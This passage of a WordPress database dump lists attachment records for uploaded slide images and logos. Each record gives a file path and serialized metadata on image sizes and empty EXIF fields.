ords\";a:0:{}}}'),(1113,1972,'_wp_attached_file','2014/07/b-slide21-1.jpg'),(1114,1972,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1048;s:4:\"file\";s:23:\"2014/07/b-slide21-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"b-slide21-1-300x164.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"b-slide21-1-1024x559.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"b-slide21-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"b-slide21-1-768x419.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:419;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:24:\"b-slide21-1-1536x838.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:838;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"b-slide21-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:24:\"b-slide21-1-1670x912.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:912;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:24:\"b-slide21-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:23:\"b-slide21-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:23:\"b-slide21-1-880x480.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:23:\"b-slide21-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:23:\"b-slide21-1-450x246.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:246;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:23:\"b-slide21-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1115,1973,'_wp_attached_file','2014/07/m-slide11-1.jpg'),(1116,1973,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:700;s:4:\"file\";s:23:\"2014/07/m-slide11-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"m-slide11-1-300x109.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"m-slide11-1-1024x373.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:373;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"m-slide11-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"m-slide11-1-768x280.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:24:\"m-slide11-1-1536x560.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:560;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"m-slide11-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:24:\"m-slide11-1-1670x609.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:609;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:24:\"m-slide11-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:23:\"m-slide11-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:23:\"m-slide11-1-880x321.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:321;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:23:\"m-slide11-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:23:\"m-slide11-1-450x164.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:23:\"m-slide11-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1117,1974,'_wp_attached_file','2014/07/m-slide21-1.jpg'),(1118,1974,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:700;s:4:\"file\";s:23:\"2014/07/m-slide21-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"m-slide21-1-300x109.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"m-slide21-1-1024x373.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:373;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"m-slide21-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"m-slide21-1-768x280.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:24:\"m-slide21-1-1536x560.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:560;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"m-slide21-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:24:\"m-slide21-1-1670x609.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:609;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:24:\"m-slide21-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:23:\"m-slide21-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:23:\"m-slide21-1-880x321.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:321;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:23:\"m-slide21-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:23:\"m-slide21-1-450x164.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:23:\"m-slide21-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1119,1975,'_wp_attached_file','2014/07/m-slide31-1.jpg'),(1120,1975,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:700;s:4:\"file\";s:23:\"2014/07/m-slide31-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"m-slide31-1-300x109.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"m-slide31-1-1024x373.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:373;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"m-slide31-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"m-slide31-1-768x280.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:280;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:24:\"m-slide31-1-1536x560.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:560;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"m-slide31-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"bg-image\";a:4:{s:4:\"file\";s:24:\"m-slide31-1-1670x609.jpg\";s:5:\"width\";i:1670;s:6:\"height\";i:609;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"fullwidth-landscape\";a:4:{s:4:\"file\";s:24:\"m-slide31-1-1170x500.jpg\";s:5:\"width\";i:1170;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:23:\"m-slide31-1-880x380.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"sidebar-auto\";a:4:{s:4:\"file\";s:23:\"m-slide31-1-880x321.jpg\";s:5:\"width\";i:880;s:6:\"height\";i:321;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:23:\"m-slide31-1-450x350.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"portfolio-auto\";a:4:{s:4:\"file\";s:23:\"m-slide31-1-450x164.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"square\";a:4:{s:4:\"file\";s:23:\"m-slide31-1-450x450.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1121,1976,'_wp_attached_file','2014/07/logo11-1.png'),(1122,1976,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:125;s:6:\"height\";i:21;s:4:\"file\";s:20:\"2014/07/logo11-1.png\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"logo11-1-100x21.png\";s:5:\"width\";i:100;s:6:\"height\";i:21;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1123,1977,'_wp_attached_file','2014/07/logo21-1.png'),(1124,1977,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:121;s:6:\"height\";i:29;s:4:\"file\";s:20:\"2014/07/logo21-1.png\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"logo21-1-100x29.png\";s:5:\"width\";i:100;s:6:\"height\";i:29;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1125,1978,'_wp_attached_file','2014/07/logo31-1.png'),(1126,1978,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:107;s:6:\"height\";i:22;s:4:\"file\";s:20:\"2014/07/logo31-1.png\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"logo31-1-100x22.png\";s:5:\"width\";i:100;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1127,1979,'_wp_attached_file','2014/07/logo41-1.png'),(1128,1979,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:110;s:6:\"height\";i:31;s:4:\"file\";s:20:\"2014/07/logo41-1.png\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"logo41-1-100x31.png\";s:5:\"width\";i:100;s:6:\"height\";i:31;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1129,1980,'_wp_attached_file','2014/07/logo51-1.png'),(1130,1980,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:125;s:6:\"height\";i:21;s:4:\"file\";s:20:\"2014/07/logo51-1.png\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"logo51-1-100x21.png\";s:5:\"width\";i:100;s:6:\"height\";i:21;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1131,1981,'_wp_attached_file','2014/07/logo61-1.png'),(1132,1981,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:107;s:6:\"height\";i:22;s:4:\"file\";s:20:\"2014/07/logo61-1.png\";s:5:\"sizes\";a:1:{s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"logo61-1-100x22.png\";s:5:\"width\";i:100;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1133,1982,'_wp_attached_file','2014/07/1b1-1.jpg'),(1134,1982,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:443;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2014/07/1b1-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"1b1-1-300x271.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"1b1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"1b1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"1b1-1-443x380.jpg\";s:5:\"width\";i:443;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"1b1-1-443x350.jpg\";s:5:\"width\";i:443;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1135,1983,'_wp_attached_file','2014/07/2b1-1.jpg'),(1136,1983,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:443;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2014/07/2b1-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"2b1-1-300x271.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"2b1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"2b1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"2b1-1-443x380.jpg\";s:5:\"width\";i:443;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"2b1-1-443x350.jpg\";s:5:\"width\";i:443;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1137,1984,'_wp_attached_file','2014/07/3b1-1.jpg'),(1138,1984,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:443;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2014/07/3b1-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"3b1-1-300x271.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"3b1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"3b1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"3b1-1-443x380.jpg\";s:5:\"width\";i:443;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"3b1-1-443x350.jpg\";s:5:\"width\";i:443;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1139,1985,'_wp_attached_file','2014/07/4b1-1.jpg'),(1140,1985,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:443;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2014/07/4b1-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"4b1-1-300x271.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"4b1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"4b1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"4b1-1-443x380.jpg\";s:5:\"width\";i:443;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"4b1-1-443x350.jpg\";s:5:\"width\";i:443;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1141,1986,'_wp_attached_file','2014/07/5b1-1.jpg'),(1142,1986,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:443;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2014/07/5b1-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"5b1-1-300x271.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"5b1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"5b1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"5b1-1-443x380.jpg\";s:5:\"width\";i:443;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"5b1-1-443x350.jpg\";s:5:\"width\";i:443;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1143,1987,'_wp_attached_file','2014/07/6b1-1.jpg'),(1144,1987,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:443;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2014/07/6b1-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"6b1-1-300x271.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"6b1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"6b1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"sidebar-landscape\";a:4:{s:4:\"file\";s:17:\"6b1-1-443x380.jpg\";s:5:\"width\";i:443;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"portfolio-square\";a:4:{s:4:\"file\";s:17:\"6b1-1-443x350.jpg\";s:5:\"width\";i:443;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s: